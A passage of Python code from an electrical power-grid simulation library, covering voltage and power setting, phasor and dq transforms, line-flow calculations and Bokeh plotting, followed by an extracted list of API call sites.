[item['i_1b_m'] for item in self.transformers] i_1c_m = [item['i_1c_m'] for item in self.transformers] i_1n_m = [item['i_1n_m'] for item in self.transformers] i_2a_m = [item['i_2a_m'] for item in self.transformers] i_2b_m = [item['i_2b_m'] for item in self.transformers] i_2c_m = [item['i_2c_m'] for item in self.transformers] i_2n_m = [item['i_2n_m'] for item in self.transformers] deg_1a = [item['deg_1a'] for item in self.transformers] deg_1b = [item['deg_1b'] for item in self.transformers] deg_1c = [item['deg_1c'] for item in self.transformers] deg_1n = [item['deg_1n'] for item in self.transformers] deg_2a = [item['deg_2a'] for item in self.transformers] deg_2b = [item['deg_2b'] for item in self.transformers] deg_2c = [item['deg_2c'] for item in self.transformers] deg_2n = [item['deg_2n'] for item in self.transformers] trafo_id = ['{:s}-{:s}'.format(item['bus_j'],item['bus_k']) for item in self.transformers] # self.line_data = dict(x_j=x_j, x_k=x_k, y_j=y_j, y_k=y_k, line_id=line_id, # i_a_m=i_a_m) self.transformer_data = dict(x_s=x_s, y_s=y_s, trafo_id=trafo_id, i_1a_m=i_1a_m, i_1b_m=i_1b_m, i_1c_m=i_1c_m, i_1n_m=i_1n_m, deg_1a=deg_1a, deg_1b=deg_1b, deg_1c=deg_1c, deg_1n=deg_1n, i_2a_m=i_2a_m, i_2b_m=i_2b_m, i_2c_m=i_2c_m, i_2n_m=i_2n_m, deg_2a=deg_2a, deg_2b=deg_2b, deg_2c=deg_2c, deg_2n=deg_2n) return self.bus_data from bokeh.io import output_notebook, show from bokeh.plotting import figure from bokeh.models import ColumnDataSource, HoverTool from bokeh.io import push_notebook from bokeh.resources import INLINE output_notebook(INLINE) def plot_results(grid): #grid.bokeh_tools() p = figure(width=600, height=400, title='Results') # trafos: source = ColumnDataSource(grid.transformer_data) trafo = p.multi_line(source=source, xs='x_s', ys='y_s', color="green", alpha=0.5, line_width=5) # lines: source = ColumnDataSource(grid.line_data) lin = p.multi_line(source=source, xs='x_s', ys='y_s', color="red", alpha=0.5, line_width=5) # buses: source = ColumnDataSource(grid.bus_data) cr = p.circle(source=source, x='x', y='y', size=15, color="navy", alpha=0.5) p.add_tools(HoverTool(renderers=[trafo], tooltips=grid.transformer_tooltip)) p.add_tools(HoverTool(renderers=[lin], tooltips=grid.line_tooltip)) p.add_tools(HoverTool(renderers=[cr], tooltips=grid.bus_tooltip)) show(p) return p def get_flow(grid_obj,bus_j,bus_k,mode='total',model='pydgrid_pydae'): if model == 'pydgrid_pydae': v_a = grid_obj.get_values(f'v_{bus_j}_a_r') + 1j* grid_obj.get_values(f'v_{bus_j}_a_i') i_l_a = grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_a_r') + 1j* grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_a_i') v_b = grid_obj.get_values(f'v_{bus_j}_b_r') + 1j* grid_obj.get_values(f'v_{bus_j}_b_i') i_l_b = grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_b_r') + 1j* grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_b_i') v_c = grid_obj.get_values(f'v_{bus_j}_c_r') + 1j* grid_obj.get_values(f'v_{bus_j}_c_i') i_l_c = grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_c_r') + 1j* grid_obj.get_values(f'i_l_{bus_j}_{bus_k}_c_i') s_a = v_a*np.conj(i_l_a) s_b = v_b*np.conj(i_l_b) s_c = v_c*np.conj(i_l_c) if mode == 'total': s_t = s_a + s_b + s_c return s_t if mode == 'abc': return s_a,s_b,s_c def set_voltage(grid_obj,bus_name,voltage,phase): ''' Set new power to a grid feeder. Parameters ---------- grid_obj : object of pydgrid.grid class bus_name : string name of the grid feeder bus. voltage : real escalar phase-phase RMS voltage magnitude phase : real escalar. phase angle in degree. Returns ------- None. ''' v_a = voltage/np.sqrt(3)*np.exp(1j*np.deg2rad(phase)) v_b = voltage/np.sqrt(3)*np.exp(1j*np.deg2rad(phase-240)) v_c = voltage/np.sqrt(3)*np.exp(1j*np.deg2rad(phase-120)) grid_obj.set_value(f'v_{bus_name}_a_r',v_a.real) grid_obj.set_value(f'v_{bus_name}_a_i',v_a.imag) grid_obj.set_value(f'v_{bus_name}_b_r',v_b.real) grid_obj.set_value(f'v_{bus_name}_b_i',v_b.imag) grid_obj.set_value(f'v_{bus_name}_c_r',v_c.real) grid_obj.set_value(f'v_{bus_name}_c_i',v_c.imag) def set_voltages(grid_obj,bus_name,voltages,phases): ''' Set new power to a grid feeder. Parameters ---------- grid_obj : object of pydgrid.grid class bus_name : string name of the grid feeder bus. voltage : real escalar phase-phase RMS voltage magnitude phase : real escalar. phase angle in degree. Returns ------- None. ''' if isinstance(phases, list): v_a = voltages[0]*np.exp(1j*np.deg2rad(phases[0])) v_b = voltages[1]*np.exp(1j*np.deg2rad(phases[1])) v_c = voltages[2]*np.exp(1j*np.deg2rad(phases[2])) else: v_a = voltages[0]*np.exp(1j*np.deg2rad(phases)) v_b = voltages[1]*np.exp(1j*np.deg2rad(phases-240)) v_c = voltages[2]*np.exp(1j*np.deg2rad(phases-120)) grid_obj.set_value(f'v_{bus_name}_a_r',v_a.real) grid_obj.set_value(f'v_{bus_name}_a_i',v_a.imag) grid_obj.set_value(f'v_{bus_name}_b_r',v_b.real) grid_obj.set_value(f'v_{bus_name}_b_i',v_b.imag) grid_obj.set_value(f'v_{bus_name}_c_r',v_c.real) grid_obj.set_value(f'v_{bus_name}_c_i',v_c.imag) def phasor2inst(grid_obj,bus_name,magnitude='v',to_bus='',phases=['a','b','c'],Freq = 50,Dt=1e-4): omega = 2*np.pi*Freq out = [] if magnitude == 'v': for ph in phases: Times = np.arange(0.0,grid_obj.T[-1,0],Dt) R = grid_obj.get_values(f'{magnitude}_{bus_name}_{ph}_r') I = grid_obj.get_values(f'{magnitude}_{bus_name}_{ph}_i') R_ = np.interp(Times,grid_obj.T[:,0],R) I_ = np.interp(Times,grid_obj.T[:,0],I) R_I = R_ + 1j*I_ cplx = np.sqrt(2)*np.exp(1j*omega*Times)*R_I out += [cplx.real] if magnitude == 'iline': for ph in phases: Times = np.arange(0.0,grid_obj.T[-1,0],Dt) R = grid_obj.get_values(f'i_l_{bus_name}_{to_bus}_{ph}_r') I = grid_obj.get_values(f'i_l_{bus_name}_{to_bus}_{ph}_i') R_ = np.interp(Times,grid_obj.T[:,0],R) I_ = np.interp(Times,grid_obj.T[:,0],I) R_I = R_ + 1j*I_ cplx = np.sqrt(2)*np.exp(1j*omega*Times)*R_I out += [cplx.real] return Times,out def get_voltage(grid_obj,bus_name,output='v_an_m'): ''' Get voltage module of a bus. Parameters ---------- grid_obj : object of pydae class bus_name : string name of the bus. output : string v_an: a phase to neutral voltage phasor (V). v_an_m: a phase to neutral RMS voltage (V). v_abcn_m: a,b and c phases to neutral voltage phasors (V). Returns ------- phase-ground voltage module (V). ''' if output in ['v_an','v_bn','v_cn']: v_sub = f'v_{bus_name}_{output[-2]}' v = grid_obj.get_value(f'{v_sub}_r') + 1j* grid_obj.get_value(f'{v_sub}_i') return v if output in ['v_an_m','v_bn_m','v_cn_m']: v_sub = f'v_{bus_name}_{output[-2]}'[:-2] v = grid_obj.get_value(f'{v_sub}_r') + 1j* grid_obj.get_value(f'{v_sub}_i') return np.abs(v) if output in ['v_abcn']: v_list = [] for ph in ['a','b','c']: v_sub = f'v_{bus_name}_{ph}' v = grid_obj.get_value(f'{v_sub}_r') + 1j* grid_obj.get_value(f'{v_sub}_i') v_list += [v] return np.array(v_list).reshape((3,1)) @numba.njit(cache=True) def abc2pq(times,v_a,v_b,v_c,i_a,i_b,i_c,omega=2*np.pi*50,theta_0=0.0): N_t = len(times) Dt = times[1]-times[0] p = np.zeros((N_t,1)) q = np.zeros((N_t,1)) for it in range(len(times)): theta = Dt*it*omega + theta_0 v_abc = np.array([[v_a[it]],[v_b[it]],[v_c[it]]]) T_p = 2.0/3.0*np.array([[ np.cos(theta), np.cos(theta-2.0/3.0*np.pi), np.cos(theta+2.0/3.0*np.pi)], [-np.sin(theta),-np.sin(theta-2.0/3.0*np.pi),-np.sin(theta+2.0/3.0*np.pi)]]) dq=T_p@v_abc; v_d = dq[0] v_q = dq[1] theta = Dt*it*omega + theta_0 i_abc = np.array([[i_a[it]],[i_b[it]],[i_c[it]]]) T_p = 2.0/3.0*np.array([[ np.cos(theta), np.cos(theta-2.0/3.0*np.pi), np.cos(theta+2.0/3.0*np.pi)], [-np.sin(theta),-np.sin(theta-2.0/3.0*np.pi),-np.sin(theta+2.0/3.0*np.pi)]]) i_dq=T_p@i_abc; i_d = i_dq[0] i_q = i_dq[1] p[it] = 3/2*(v_d*i_d + v_q*i_q) q[it] = 3/2*(v_d*i_q - v_q*i_d) return p,q @numba.njit(cache=True) def abc2dq(times,v_a,v_b,v_c,i_a,i_b,i_c,omega=2*np.pi*50,theta_0=0.0,K_p=0.1,K_i=20.0,T_f=20.0e-3): N_t = len(times) Dt = times[1]-times[0] v_d = np.zeros((N_t,1)) v_q = np.zeros((N_t,1)) i_d = np.zeros((N_t,1)) i_q = np.zeros((N_t,1)) p = np.zeros((N_t,1)) q = np.zeros((N_t,1)) theta = 0.0 xi = 0.0 theta_pll = np.zeros((N_t,1)) omega_pll = np.zeros((N_t,1)) dq = np.zeros((2,1)) idx = np.argmax(times>0.08) theta_pll[0,0] = theta_0 #omega_pll = np.zeros((N_t,1)) for it in range(len(times)-1): theta = theta_pll[it,0] v_abc = np.array([[v_a[it]],[v_b[it]],[v_c[it]]]) i_abc = np.array([[i_a[it]],[i_b[it]],[i_c[it]]]) T_p = 2.0/3.0*np.array([[ np.cos(theta), np.cos(theta-2.0/3.0*np.pi), np.cos(theta+2.0/3.0*np.pi)], [-np.sin(theta),-np.sin(theta-2.0/3.0*np.pi),-np.sin(theta+2.0/3.0*np.pi)]]) v_dq = T_p@v_abc; i_dq = T_p@i_abc; v_d[it+1,0] = v_d[it,0] + Dt/T_f*(v_dq[0,0] - v_d[it,0]) v_q[it+1,0] = v_q[it,0] + Dt/T_f*(v_dq[1,0] - v_q[it,0]) i_d[it+1,0] = i_d[it,0] + Dt/T_f*(i_dq[0,0] - i_d[it,0]) i_q[it+1,0] = i_q[it,0] + Dt/T_f*(i_dq[1,0] - i_q[it,0]) p[it] = 3/2*(v_d[it+1,0] *i_d[it+1,0] + v_q[it+1,0] *i_q[it+1,0] ) q[it] = 3/2*(v_q[it+1,0] *i_d[it+1,0] - v_d[it+1,0] *i_q[it+1,0] ) xi += Dt*v_dq[0,0] omega_pll[it,0] = K_p * v_dq[0,0] + K_i * xi + omega theta_pll[it+1,0] += theta_pll[it,0] + Dt*(omega_pll[it,0]) omega_pll[it+1,0] = K_p * v_dq[0,0] + K_i * xi + omega return theta_pll,omega_pll,v_d,v_q,i_d,i_q,p,q def change_line(system,bus_j,bus_k, *args,**kwagrs): line = kwagrs S_base = system.get_value('S_base') line_name = f"{bus_j}_{bus_k}" if 'X_pu' in line: if 'S_mva' in line: S_line = 1e6*line['S_mva'] R = line['R_pu']*S_base/S_line # in pu of the system base X = line['X_pu']*S_base/S_line # in pu of the system base if 'X' in line: U_base = system.get_value(f'U_{bus_j}_n') Z_base = U_base**2/S_base R = line['R']/Z_base # in pu of the system base X = line['X']/Z_base # in pu of the system base if 'X_km' in line: U_base = system.get_value(f'U_{bus_j}_n') Z_base = U_base**2/S_base R = line['R_km']*line['km']/Z_base # in pu of the system base X = line['X_km']*line['km']/Z_base # in pu of the system base if 'Bs_km' in line: U_base = system.get_value(f'U_{bus_j}_n') Z_base = U_base**2/S_base print('U_base',U_base,'Z_base',Z_base) Y_base = 1.0/Z_base Bs = line['Bs_km']*line['km']/Y_base # in pu of the system base bs = Bs system.set_value(f'bs_{line_name}',bs) print(bs) G = R/(R**2+X**2) B = -X/(R**2+X**2) system.set_value(f"g_{line_name}",G) system.set_value(f"b_{line_name}",B) def get_line_i(system,bus_from,bus_to,U_kV=66e3): if f"b_{bus_from}_{bus_to}" in system.params_list: bus_j = bus_from bus_k = bus_to current_direction = 1.0 elif f"b_{bus_to}_{bus_from}" in system.params_list: bus_j = bus_to bus_k = bus_from current_direction = -1.0 else: print(f'No line from {bus_from} to {bus_to}') return line_name = f"{bus_j}_{bus_k}" V_j_m = system.get_value(f"V_{bus_j}") theta_j = system.get_value(f"theta_{bus_j}") V_k_m = system.get_value(f"V_{bus_k}") theta_k = system.get_value(f"theta_{bus_k}") V_j = V_j_m*np.exp(1j*theta_j) V_k = V_k_m*np.exp(1j*theta_k) Y_jk = system.get_value(f"g_{line_name}") + 1j*system.get_value(f"b_{line_name}") S_base = system.get_value('S_base') U_base = system.get_value(f"U_{bus_j}_n") I_jk_pu = current_direction*Y_jk*(V_j - V_k) I_base = S_base/(np.sqrt(3)*U_base) I_jk = I_jk_pu*I_base return I_jk def get_line_s(system,bus_from,bus_to,U_kV=66e3): if f"b_{bus_from}_{bus_to}" in system.params_list: bus_j = bus_from bus_k = bus_to current_direction = 1.0 elif f"b_{bus_to}_{bus_from}" in system.params_list: bus_j = bus_to bus_k = bus_from current_direction = -1.0 else: print(f'No line from {bus_from} to {bus_to}') return line_name = f"{bus_j}_{bus_k}" V_j_m = system.get_value(f"V_{bus_j}") theta_j = system.get_value(f"theta_{bus_j}") V_k_m = system.get_value(f"V_{bus_k}") theta_k = system.get_value(f"theta_{bus_k}") V_j = V_j_m*np.exp(1j*theta_j) V_k = V_k_m*np.exp(1j*theta_k) Y_jk = system.get_value(f"g_{line_name}") + 1j*system.get_value(f"b_{line_name}") S_base = system.get_value('S_base') U_base = system.get_value(f"U_{bus_j}_n") I_jk_pu = current_direction*Y_jk*(V_j - V_k) I_base = S_base/(np.sqrt(3)*U_base) I_jk = I_jk_pu*I_base S_jk_pu = V_j*np.conj(I_jk_pu) S_jk = S_base*S_jk_pu return S_jk def set_powers(grid_obj,bus_name,s_cplx,mode='urisi_3ph'): ''' Function for simplifying the power setting. Parameters ---------- grid_obj : pydae object pydae object with grid of type pydgrid. bus_name : string name of the bus to xhange the power. s_cplx : TYPE complex power (negative for load, positive for generated). Returns ------- None. ''' if mode == 'urisi_3ph': p = s_cplx.real q = s_cplx.imag for ph in ['a','b','c']: grid_obj.set_value(f'p_{bus_name}_{ph}',p/3) grid_obj.set_value(f'q_{bus_name}_{ph}',q/3) if mode == 'urisi_abc': p = s_cplx.real q = s_cplx.imag for ph in ['a','b','c']: grid_obj.set_value(f'p_{bus_name}_{ph}',p/3) grid_obj.set_value(f'q_{bus_name}_{ph}',q/3)
[ "numpy.sqrt", "bokeh.plotting.figure", "numpy.array", "numpy.sin", "numpy.arange", "pydae.tools.get_v", "numpy.exp", "numpy.vstack", "numpy.abs", "bokeh.io.show", "json.loads", "collections.namedtuple", "numpy.average", "numpy.conj", "pydae.tools.get_i", "numba.njit", "numpy.argmax", "numpy.deg2rad", "bokeh.models.ColumnDataSource", "numpy.cos", "numpy.interp", "bokeh.models.HoverTool", "numpy.copy", "bokeh.io.output_notebook", "numpy.angle", "numpy.zeros", "numpy.load" ]
[((32422, 32445), 'bokeh.io.output_notebook', 'output_notebook', (['INLINE'], {}), '(INLINE)\n', (32437, 32445), False, 'from bokeh.io import output_notebook, show\n'), ((38645, 38667), 'numba.njit', 'numba.njit', ([], {'cache': '(True)'}), '(cache=True)\n', (38655, 38667), False, 'import numba\n'), ((39755, 39777), 'numba.njit', 'numba.njit', ([], {'cache': '(True)'}), '(cache=True)\n', (39765, 39777), False, 'import numba\n'), ((32510, 32556), 'bokeh.plotting.figure', 'figure', ([], {'width': '(600)', 'height': '(400)', 'title': '"""Results"""'}), "(width=600, height=400, title='Results')\n", (32516, 32556), False, 'from bokeh.plotting import figure\n'), ((32604, 32643), 'bokeh.models.ColumnDataSource', 'ColumnDataSource', (['grid.transformer_data'], {}), '(grid.transformer_data)\n', (32620, 32643), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((32775, 32807), 'bokeh.models.ColumnDataSource', 'ColumnDataSource', (['grid.line_data'], {}), '(grid.line_data)\n', (32791, 32807), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((32935, 32966), 'bokeh.models.ColumnDataSource', 'ColumnDataSource', (['grid.bus_data'], {}), '(grid.bus_data)\n', (32951, 32966), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((33280, 33287), 'bokeh.io.show', 'show', (['p'], {}), '(p)\n', (33284, 33287), False, 'from bokeh.io import output_notebook, show\n'), ((38797, 38815), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (38805, 38815), True, 'import numpy as np\n'), ((38823, 38841), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (38831, 38841), True, 'import numpy as np\n'), ((39940, 39958), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (39948, 39958), True, 'import numpy as np\n'), ((39968, 39986), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (39976, 39986), True, 'import numpy as np\n'), ((39996, 40014), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40004, 40014), True, 'import numpy as np\n'), ((40024, 40042), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40032, 40042), True, 'import numpy as np\n'), ((40050, 40068), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40058, 40068), True, 'import numpy as np\n'), ((40076, 40094), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40084, 40094), True, 'import numpy as np\n'), ((40144, 40162), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40152, 40162), True, 'import numpy as np\n'), ((40179, 40197), 'numpy.zeros', 'np.zeros', (['(N_t, 1)'], {}), '((N_t, 1))\n', (40187, 40197), True, 'import numpy as np\n'), ((40207, 40223), 'numpy.zeros', 'np.zeros', (['(2, 1)'], {}), '((2, 1))\n', (40215, 40223), True, 'import numpy as np\n'), ((40234, 40257), 'numpy.argmax', 'np.argmax', (['(times > 0.08)'], {}), '(times > 0.08)\n', (40243, 40257), True, 'import numpy as np\n'), ((1124, 1145), 'json.loads', 'json.loads', (['json_data'], {}), '(json_data)\n', (1134, 1145), False, 'import json\n'), ((2343, 2369), 'numpy.copy', 'np.copy', (['V_node[:self.N_v]'], {}), '(V_node[:self.N_v])\n', (2350, 2369), True, 'import numpy as np\n'), ((2390, 2416), 'numpy.copy', 'np.copy', (['V_node[self.N_v:]'], {}), '(V_node[self.N_v:])\n', (2397, 2416), True, 'import numpy as np\n'), ((2671, 2712), 'numpy.vstack', 'np.vstack', (['(self.I_unknown, self.I_known)'], {}), '((self.I_unknown, self.I_known))\n', (2680, 2712), True, 'import numpy as np\n'), ((21247, 21257), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (21254, 21257), True, 'import numpy as np\n'), ((33069, 33132), 'bokeh.models.HoverTool', 'HoverTool', ([], {'renderers': '[trafo]', 'tooltips': 'grid.transformer_tooltip'}), '(renderers=[trafo], tooltips=grid.transformer_tooltip)\n', (33078, 33132), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((33150, 33204), 'bokeh.models.HoverTool', 'HoverTool', ([], {'renderers': '[lin]', 'tooltips': 'grid.line_tooltip'}), '(renderers=[lin], tooltips=grid.line_tooltip)\n', (33159, 33204), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((33222, 33274), 'bokeh.models.HoverTool', 'HoverTool', ([], {'renderers': '[cr]', 'tooltips': 'grid.bus_tooltip'}), '(renderers=[cr], tooltips=grid.bus_tooltip)\n', (33231, 33274), False, 'from bokeh.models import ColumnDataSource, HoverTool\n'), ((38338, 38347), 'numpy.abs', 'np.abs', (['v'], {}), '(v)\n', (38344, 38347), True, 'import numpy as np\n'), ((38929, 38972), 'numpy.array', 'np.array', (['[[v_a[it]], [v_b[it]], [v_c[it]]]'], {}), '([[v_a[it]], [v_b[it]], [v_c[it]]])\n', (38937, 38972), True, 'import numpy as np\n'), ((39315, 39358), 'numpy.array', 'np.array', (['[[i_a[it]], [i_b[it]], [i_c[it]]]'], {}), '([[i_a[it]], [i_b[it]], [i_c[it]]])\n', (39323, 39358), True, 'import numpy as np\n'), ((40416, 40459), 'numpy.array', 'np.array', (['[[v_a[it]], [v_b[it]], [v_c[it]]]'], {}), '([[v_a[it]], [v_b[it]], [v_c[it]]])\n', (40424, 40459), True, 'import numpy as np\n'), ((40474, 40517), 'numpy.array', 'np.array', (['[[i_a[it]], [i_b[it]], [i_c[it]]]'], {}), '([[i_a[it]], [i_b[it]], [i_c[it]]])\n', (40482, 40517), True, 'import numpy as np\n'), ((43475, 43497), 'numpy.exp', 'np.exp', (['(1.0j * theta_j)'], {}), '(1.0j * theta_j)\n', (43481, 43497), True, 'import numpy as np\n'), ((43510, 43532), 'numpy.exp', 'np.exp', (['(1.0j * theta_k)'], {}), '(1.0j * theta_k)\n', (43516, 43532), True, 'import numpy as np\n'), ((44504, 44526), 'numpy.exp', 'np.exp', (['(1.0j * theta_j)'], {}), '(1.0j * theta_j)\n', (44510, 44526), True, 'import numpy as np\n'), ((44539, 44561), 'numpy.exp', 'np.exp', (['(1.0j * theta_k)'], {}), '(1.0j * theta_k)\n', (44545, 44561), True, 'import numpy as np\n'), ((44868, 44884), 'numpy.conj', 'np.conj', (['I_jk_pu'], {}), '(I_jk_pu)\n', (44875, 44884), True, 'import numpy as np\n'), ((429, 452), 'numpy.load', 'np.load', (['"""matrices.npz"""'], {}), "('matrices.npz')\n", (436, 452), True, 'import numpy as np\n'), ((2132, 2221), 'pydae.tools.get_v', 'get_v', (['self.syst', 'bus_name'], {'phase_name': 'n2a[phase_name]', 'v_type': '"""phasor"""', 'dq_name': '"""ri"""'}), "(self.syst, bus_name, phase_name=n2a[phase_name], v_type='phasor',\n dq_name='ri')\n", (2137, 2221), False, 'from pydae.tools import get_v, get_i, get_s\n'), ((21608, 21654), 'numpy.array', 'np.array', (['[v_an_float, v_bn_float, v_cn_float]'], {}), '([v_an_float, v_bn_float, v_cn_float])\n', (21616, 21654), True, 'import numpy as np\n'), ((21673, 21690), 'numpy.average', 'np.average', (['v_abc'], {}), '(v_abc)\n', (21683, 21690), True, 'import numpy as np\n'), ((23829, 23861), 'numpy.abs', 'np.abs', (['(p_total + 1.0j * q_total)'], {}), '(p_total + 1.0j * q_total)\n', (23835, 23861), True, 'import numpy as np\n'), ((34078, 34092), 'numpy.conj', 'np.conj', (['i_l_a'], {}), '(i_l_a)\n', (34085, 34092), True, 'import numpy as np\n'), ((34111, 34125), 'numpy.conj', 'np.conj', (['i_l_b'], {}), '(i_l_b)\n', (34118, 34125), True, 'import numpy as np\n'), ((34144, 34158), 'numpy.conj', 'np.conj', (['i_l_c'], {}), '(i_l_c)\n', (34151, 34158), True, 'import numpy as np\n'), ((34730, 34740), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (34737, 34740), True, 'import numpy as np\n'), ((34788, 34798), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (34795, 34798), True, 'import numpy as np\n'), ((34850, 34860), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (34857, 34860), True, 'import numpy as np\n'), ((36567, 36604), 'numpy.arange', 'np.arange', (['(0.0)', 'grid_obj.T[-1, 0]', 'Dt'], {}), '(0.0, grid_obj.T[-1, 0], Dt)\n', (36576, 36604), True, 'import numpy as np\n'), ((36760, 36797), 'numpy.interp', 'np.interp', (['Times', 'grid_obj.T[:, 0]', 'R'], {}), '(Times, grid_obj.T[:, 0], R)\n', (36769, 36797), True, 'import numpy as np\n'), ((36812, 36849), 'numpy.interp', 'np.interp', (['Times', 'grid_obj.T[:, 0]', 'I'], {}), '(Times, grid_obj.T[:, 0], I)\n', (36821, 36849), True, 'import numpy as np\n'), ((37040, 37077), 'numpy.arange', 'np.arange', (['(0.0)', 'grid_obj.T[-1, 0]', 'Dt'], {}), '(0.0, grid_obj.T[-1, 0], Dt)\n', (37049, 37077), True, 'import numpy as np\n'), ((37235, 37272), 'numpy.interp', 'np.interp', (['Times', 'grid_obj.T[:, 0]', 'R'], {}), '(Times, grid_obj.T[:, 0], R)\n', (37244, 37272), True, 'import numpy as np\n'), ((37287, 37324), 'numpy.interp', 'np.interp', (['Times', 'grid_obj.T[:, 0]', 'I'], {}), '(Times, grid_obj.T[:, 0], I)\n', (37296, 37324), True, 'import numpy as np\n'), ((43776, 43786), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (43783, 43786), True, 'import numpy as np\n'), ((44805, 44815), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (44812, 44815), True, 'import numpy as np\n'), ((2266, 2287), 'numpy.array', 'np.array', (['V_node_list'], {}), '(V_node_list)\n', (2274, 2287), True, 'import numpy as np\n'), ((2598, 2619), 'numpy.array', 'np.array', (['I_node_list'], {}), '(I_node_list)\n', (2606, 2619), True, 'import numpy as np\n'), ((4022, 4108), 'pydae.tools.get_i', 'get_i', (['self.syst', "('vsc_' + bus_name)"], {'phase_name': 'ph', 'i_type': '"""phasor"""', 'dq_name': '"""ri"""'}), "(self.syst, 'vsc_' + bus_name, phase_name=ph, i_type='phasor', dq_name\n ='ri')\n", (4027, 4108), False, 'from pydae.tools import get_v, get_i, get_s\n'), ((7253, 7296), 'collections.namedtuple', 'namedtuple', (['"""tup"""', "['v_ag', 'v_bg', 'v_cg']"], {}), "('tup', ['v_ag', 'v_bg', 'v_cg'])\n", (7263, 7296), False, 'from collections import namedtuple\n'), ((9052, 9127), 'collections.namedtuple', 'namedtuple', (['"""tup"""', "['v_ag', 'v_bg', 'v_cg', 'v_ng', 'v_an', 'v_bn', 'v_cn']"], {}), "('tup', ['v_ag', 'v_bg', 'v_cg', 'v_ng', 'v_an', 'v_bn', 'v_cn'])\n", (9062, 9127), False, 'from collections import namedtuple\n'), ((9226, 9244), 'numpy.array', 'np.array', (['V_sorted'], {}), '(V_sorted)\n', (9234, 9244), True, 'import numpy as np\n'), ((34751, 34768), 'numpy.deg2rad', 'np.deg2rad', (['phase'], {}), '(phase)\n', (34761, 34768), True, 'import numpy as np\n'), ((34809, 34832), 'numpy.deg2rad', 'np.deg2rad', (['(phase - 240)'], {}), '(phase - 240)\n', (34819, 34832), True, 'import numpy as np\n'), ((34871, 34894), 'numpy.deg2rad', 'np.deg2rad', (['(phase - 120)'], {}), '(phase - 120)\n', (34881, 34894), True, 'import numpy as np\n'), ((38605, 38621), 'numpy.array', 'np.array', (['v_list'], {}), '(v_list)\n', (38613, 38621), True, 'import numpy as np\n'), ((2973, 3059), 'pydae.tools.get_i', 'get_i', (['self.syst', "('load_' + bus_name)"], {'phase_name': 'ph', 'i_type': '"""phasor"""', 'dq_name': '"""ri"""'}), "(self.syst, 'load_' + bus_name, phase_name=ph, i_type='phasor',\n dq_name='ri')\n", (2978, 3059), False, 'from pydae.tools import get_v, get_i, get_s\n'), ((4425, 4510), 'pydae.tools.get_i', 'get_i', (['self.syst', "('vsc_' + bus_name)"], {'phase_name': 'ph', 'i_type': '"""phasor"""', 'dq_name': '"""r"""'}), "(self.syst, 'vsc_' + bus_name, phase_name=ph, i_type='phasor', dq_name='r'\n )\n", (4430, 4510), False, 'from pydae.tools import get_v, get_i, get_s\n'), ((6218, 6230), 'numpy.conj', 'np.conj', (['i_a'], {}), '(i_a)\n', (6225, 6230), True, 'import numpy as np\n'), ((6260, 6272), 'numpy.conj', 'np.conj', (['i_b'], {}), '(i_b)\n', (6267, 6272), True, 'import numpy as np\n'), ((6302, 6314), 'numpy.conj', 'np.conj', (['i_c'], {}), '(i_c)\n', (6309, 6314), True, 'import numpy as np\n'), ((8001, 8013), 'numpy.conj', 'np.conj', (['i_a'], {}), '(i_a)\n', (8008, 8013), True, 'import numpy as np\n'), ((8043, 8055), 'numpy.conj', 'np.conj', (['i_b'], {}), '(i_b)\n', (8050, 8055), True, 'import numpy as np\n'), ((8085, 8097), 'numpy.conj', 'np.conj', (['i_c'], {}), '(i_c)\n', (8092, 8097), True, 'import numpy as np\n'), ((10747, 10759), 'numpy.abs', 'np.abs', (['I_1a'], {}), '(I_1a)\n', (10753, 10759), True, 'import numpy as np\n'), ((10797, 10809), 'numpy.abs', 'np.abs', (['I_1b'], {}), '(I_1b)\n', (10803, 10809), True, 'import numpy as np\n'), ((10847, 10859), 'numpy.abs', 'np.abs', (['I_1c'], {}), '(I_1c)\n', (10853, 10859), True, 'import numpy as np\n'), ((10897, 10909), 'numpy.abs', 'np.abs', (['I_1n'], {}), '(I_1n)\n', (10903, 10909), True, 'import numpy as np\n'), ((10947, 10959), 'numpy.abs', 'np.abs', (['I_2a'], {}), '(I_2a)\n', (10953, 10959), True, 'import numpy as np\n'), ((10997, 11009), 'numpy.abs', 'np.abs', (['I_2b'], {}), '(I_2b)\n', (11003, 11009), True, 'import numpy as np\n'), ((11047, 11059), 'numpy.abs', 'np.abs', (['I_2c'], {}), '(I_2c)\n', (11053, 11059), True, 'import numpy as np\n'), ((11097, 11109), 'numpy.abs', 'np.abs', (['I_2n'], {}), '(I_2n)\n', (11103, 11109), True, 'import numpy as np\n'), ((11147, 11171), 'numpy.angle', 'np.angle', (['I_1a'], {'deg': '(True)'}), '(I_1a, deg=True)\n', (11155, 11171), True, 'import numpy as np\n'), ((11209, 11233), 'numpy.angle', 'np.angle', (['I_1b'], {'deg': '(True)'}), '(I_1b, deg=True)\n', (11217, 11233), True, 'import numpy as np\n'), ((11271, 11295), 'numpy.angle', 'np.angle', (['I_1c'], {'deg': '(True)'}), '(I_1c, 